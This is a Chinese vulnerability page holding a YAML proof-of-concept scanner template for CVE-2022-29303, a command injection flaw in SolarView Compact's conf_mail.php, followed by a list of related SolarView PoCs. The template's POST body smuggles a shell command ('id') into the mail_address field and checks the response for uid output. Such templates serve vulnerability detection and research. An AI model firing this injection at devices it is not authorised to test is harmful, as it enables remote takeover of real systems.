CVE-2022-29303: SolarView Compact conf_mail.php 远程命令执行漏洞

漏洞描述

PoC代码[已公开]

id: CVE-2022-29303

info:
  name: SolarView Compact conf_mail.php 远程命令执行漏洞
  author: zan8in
  severity: critical
  description: |-
    SolarView Compact conf_mail.php 存在远程命令执行漏洞，攻击者通过构造特殊的请求，可以获取服务器权限
    body="SolarView Compact" && title=="Top"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29303
  tags: cve,cve2022,solarview,compact,conf_mail,remotecommandexecution,rce
  created: 2023/06/23

rules:
  r0:
    request:
      method: POST
      path: /conf_mail.php
      body: |
        mail_address=%3Bid%3B&button=%83%81%81%5B%83%8B%91%97%90M
    expression: response.status == 200 &&  "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()

相关漏洞推荐

• POC CVE-2022-29298: SolarView Compact 6.00 - Local File Inclusion
• POC CVE-2022-29299: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting
• POC CVE-2022-29301: SolarView Compact 6.00 - 'pow' Cross-Site Scripting
• POC CVE-2022-29303: SolarView Compact 6.00 - OS Command Injection
• POC CVE-2022-31373: SolarView Compact 6.00 - Cross-Site Scripting
• POC CVE-2023-23333: SolarView Compact 6.00 - OS Command Injection
• POC CVE-2023-29919: SolarView Compact <= 6.00 - Local File Inclusion
• POC CVE-2023-29919: SolarView Compact <= 6.00 - Local File Inclusion
• POC solarview-compact-xss: SolarView Compact 6.00 - Cross-Site Scripting
• SolarView Compact CVE-2022-29303命令注入漏洞
• SolarView Compact CVE-2022-29299 XSS 漏洞
• SolarView Compact through 6.00 命令执行漏洞
• Contec SolarView Compact /Solar_Image.php 任意文件上传漏洞